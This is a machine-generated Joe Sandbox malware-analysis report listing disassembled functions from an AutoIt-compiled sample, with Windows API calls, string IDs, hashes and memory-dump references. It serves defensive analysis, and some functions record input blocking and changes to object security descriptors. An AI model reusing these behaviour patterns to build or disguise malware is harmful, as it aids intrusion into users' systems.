                                                                                                                                            • API ID: BlockInput
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                            • Opcode ID: 3ca4777436b2b41215376ceff793457ea99e02b938790bece53dfbbc92dd7c8a
                                                                                                                                            • Instruction ID: 66a956820cebc2c85d7a0b671e8a2f99a15ec046eae87277ce61f34ec1da0fb7
                                                                                                                                            • Opcode Fuzzy Hash: 3ca4777436b2b41215376ceff793457ea99e02b938790bece53dfbbc92dd7c8a
                                                                                                                                            • Instruction Fuzzy Hash: 5EE012312102056FC7109F6AD804E96BBD9EFA4761F008429F949D7251DA70AD41CBA1
                                                                                                                                            APIs
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00DE075E), ref: 00DE0D4A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                            • Opcode ID: fed490f4703e77d1a66ce045f6d10e5290bf25cec984fc0e2a26a2439daafda6
                                                                                                                                            • Instruction ID: 33cf4f917386daa4ab6bd305d7eca44bca44f20cf51b18ecce26062755843b92
                                                                                                                                            • Opcode Fuzzy Hash: fed490f4703e77d1a66ce045f6d10e5290bf25cec984fc0e2a26a2439daafda6
                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                            APIs
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00E4358D
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00E435A0
                                                                                                                                            • DestroyWindow.USER32 ref: 00E435AF
                                                                                                                                            • GetDesktopWindow.USER32 ref: 00E435CA
                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00E435D1
                                                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00E43700
                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00E4370E
                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E43755
                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00E43761
                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E4379D
                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E437BF
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E437D2
                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E437DD
                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00E437E6
                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E437F5
                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00E437FE
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E43805
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00E43810
                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E43822
                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E60C04,00000000), ref: 00E43838
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00E43848
                                                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00E4386E
                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00E4388D
                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E438AF
                                                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E43A9C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                                                            • Opcode ID: aa205c84ca5b2d168a4288577922458a84466e2ff83dc7836035a82863cd4d20
                                                                                                                                            • Instruction ID: d8b30b9bc8c4a7f364fba712b65e9e84302bf3fa257c26c4d51c59bab432e8f2
                                                                                                                                            • Opcode Fuzzy Hash: aa205c84ca5b2d168a4288577922458a84466e2ff83dc7836035a82863cd4d20
                                                                                                                                            • Instruction Fuzzy Hash: 68028E71900206AFDB28DF65DD89EAE7BB9EF48311F008559F915AB2A0CB74AD05CF60
                                                                                                                                            APIs
                                                                                                                                            • DestroyWindow.USER32(?,?), ref: 00DC16B4
                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E02B07
                                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E02B40
                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E02F85
                                                                                                                                              • Part of subcall function 00DC1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DC1488,?,00000000,?,?,?,?,00DC145A,00000000,?), ref: 00DC1865
                                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00E02FC1
                                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E02FD8
                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E02FEE
                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E02FF9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                            • String ID: 0$($($(
                                                                                                                                            • API String ID: 2760611726-1684351147
                                                                                                                                            • Opcode ID: 7cd7ce3c89a1d19e2c7a0a6e2096c5a5a172c00d44688f9c263da7a1cf3bb21c
                                                                                                                                            • Instruction ID: a38461dc10b52d29224d8f195e7fbcb3b48bdcc5a4284b77252ea30b83c102da
                                                                                                                                            • Opcode Fuzzy Hash: 7cd7ce3c89a1d19e2c7a0a6e2096c5a5a172c00d44688f9c263da7a1cf3bb21c
                                                                                                                                            • Instruction Fuzzy Hash: 6E12B234204212EFDB25CF24C888F69B7E5FB45305F18556EE685AB2A1C731EC8ADB51
                                                                                                                                            APIs
                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 00E4319B
                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E432C7
                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00E43306
                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00E43316
                                                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00E4335D
                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00E43369
                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00E433B2
                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E433C1
                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00E433D1
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00E433D5
                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00E433E5
                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E433EE
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00E433F7
                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E43423
                                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E4343A
                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00E4347A
                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E4348E
                                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E4349F
                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00E434D4
                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00E434DF
                                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E434EA
                                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00E434F4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                                            • Opcode ID: ee0b648e443ad1d14aa1a6aae88dcb8a07a61195f21aab6d92ae565d93ced249
                                                                                                                                            • Instruction ID: d18a6b37f9fb705e680d9bb18250b03fc6108077e71ce72b39b952523c10d181
                                                                                                                                            • Opcode Fuzzy Hash: ee0b648e443ad1d14aa1a6aae88dcb8a07a61195f21aab6d92ae565d93ced249
                                                                                                                                            • Instruction Fuzzy Hash: C1B15E71A00205BFDB24DFB5DC45FAEBBA9EB08711F004519FA15E72A0D7B4AD44CBA4
                                                                                                                                            APIs
                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00E35532
                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00E5DC30,?,\\.\,00E5DCD0), ref: 00E3560F
                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00E5DC30,?,\\.\,00E5DCD0), ref: 00E3577B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                                                            • Opcode ID: 2e76df6c0ba27ddab441ab0ba583745f328241e0de942a9d5187e3b1864cf6e2
                                                                                                                                            • Instruction ID: 0b25c967d308785fc9101b472b8ef78f9190746fbd063a07c5369737d55d0185
                                                                                                                                            • Opcode Fuzzy Hash: 2e76df6c0ba27ddab441ab0ba583745f328241e0de942a9d5187e3b1864cf6e2
                                                                                                                                            • Instruction Fuzzy Hash: CD61B332A08A05DFC724EF24C99ADB87BA1EF45354F34641AE44EBB391C631DD41CBA1
                                                                                                                                            APIs
                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DC25F8
                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00DC2600
                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DC262B
                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00DC2633
                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00DC2658
                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DC2675
                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DC2685
                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DC26B8
                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DC26CC
                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00DC26EA
                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00DC2706
                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC2711
                                                                                                                                              • Part of subcall function 00DC19CD: GetCursorPos.USER32(?), ref: 00DC19E1
                                                                                                                                              • Part of subcall function 00DC19CD: ScreenToClient.USER32(00000000,?), ref: 00DC19FE
                                                                                                                                              • Part of subcall function 00DC19CD: GetAsyncKeyState.USER32(00000001), ref: 00DC1A23
                                                                                                                                              • Part of subcall function 00DC19CD: GetAsyncKeyState.USER32(00000002), ref: 00DC1A3D
                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00DC199C), ref: 00DC2738
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                            • String ID: <)$<)$AutoIt v3 GUI$($($(
                                                                                                                                            • API String ID: 1458621304-3080182634
                                                                                                                                            • Opcode ID: 3e149027e72b51211315c417491b2c5cd6a23eec7e10826fed11fa1ea68fdc83
                                                                                                                                            • Instruction ID: 6a8948473cf2c5b9bf578077afd1da165916479b22e8ebb5d7bd780537c66dd7
                                                                                                                                            • Opcode Fuzzy Hash: 3e149027e72b51211315c417491b2c5cd6a23eec7e10826fed11fa1ea68fdc83
                                                                                                                                            • Instruction Fuzzy Hash: 67B15B35A0020AAFDF18DFA9CC45FAE7BB5EB88315F10421AFA15A72D0D774D944CB61
                                                                                                                                            APIs
                                                                                                                                            • GetCursorPos.USER32(?), ref: 00E51BC4
                                                                                                                                            • GetDesktopWindow.USER32 ref: 00E51BD9
                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00E51BE0
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E51C35
                                                                                                                                            • DestroyWindow.USER32(?), ref: 00E51C55
                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E51C89
                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E51CA7
                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E51CB9
                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00E51CCE
                                                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E51CE1
                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 00E51D3D
                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E51D58
                                                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E51D6C
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00E51D84
                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00E51DAA
                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00E51DC4
                                                                                                                                            • CopyRect.USER32(?,?), ref: 00E51DDB
                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 00E51E46
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                                            • API String ID: 698492251-4156429822
                                                                                                                                            • Opcode ID: 58e81ea454488691d0b62be52b5e5100459d7ec696ae7eea21c19c724ce31ea8
                                                                                                                                            • Instruction ID: 8b1bba2634e83ad0e4901294ebab5f62460339e2d1155ad3bf1915f34cb17d85
                                                                                                                                            • Opcode Fuzzy Hash: 58e81ea454488691d0b62be52b5e5100459d7ec696ae7eea21c19c724ce31ea8
                                                                                                                                            • Instruction Fuzzy Hash: 6EB19D71608301AFD714DF64C884B5ABBE5EF84315F008D5DF999AB261CB71E849CBA2
                                                                                                                                            APIs
                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00E50D81
                                                                                                                                            • _wcslen.LIBCMT ref: 00E50DBB
                                                                                                                                            • _wcslen.LIBCMT ref: 00E50E25
                                                                                                                                            • _wcslen.LIBCMT ref: 00E50E8D
                                                                                                                                            • _wcslen.LIBCMT ref: 00E50F11
                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E50F61
                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E50FA0
                                                                                                                                              • Part of subcall function 00DDFD52: _wcslen.LIBCMT ref: 00DDFD5D
                                                                                                                                              • Part of subcall function 00E22B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E22BA5
                                                                                                                                              • Part of subcall function 00E22B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E22BD7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                            • API String ID: 1103490817-719923060
                                                                                                                                            • Opcode ID: 66798546f5b3877732b3664f291f06923e95675be25137d3a29cac5094d6f9c5
                                                                                                                                            • Instruction ID: 1d957ab4c1557b79c5148d46ce872a2dbf81efe68188827071e1c7562797d66a
                                                                                                                                            • Opcode Fuzzy Hash: 66798546f5b3877732b3664f291f06923e95675be25137d3a29cac5094d6f9c5
                                                                                                                                            • Instruction Fuzzy Hash: CFE1AF312183418FCB14EF24C95196AB3E6FF84319B145D9DF89AAB3A1DB30ED49CB61
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E21A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E21A60
                                                                                                                                              • Part of subcall function 00E21A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A6C
                                                                                                                                              • Part of subcall function 00E21A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A7B
                                                                                                                                              • Part of subcall function 00E21A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A82
                                                                                                                                              • Part of subcall function 00E21A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E21A99
                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E21741
                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E21775
                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00E2178C
                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00E217C6
                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E217E2
                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00E217F9
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E21801
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00E21808
                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E21829
                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00E21830
                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E2185F
                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E21881
                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E21893
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E218BA
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00E218C1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E218CA
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00E218D1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E218DA
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00E218E1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00E218ED
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00E218F4
                                                                                                                                              • Part of subcall function 00E21ADF: GetProcessHeap.KERNEL32(00000008,00E214FD,?,00000000,?,00E214FD,?), ref: 00E21AED
                                                                                                                                              • Part of subcall function 00E21ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E214FD,?), ref: 00E21AF4
                                                                                                                                              • Part of subcall function 00E21ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E214FD,?), ref: 00E21B03
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4175595110-0
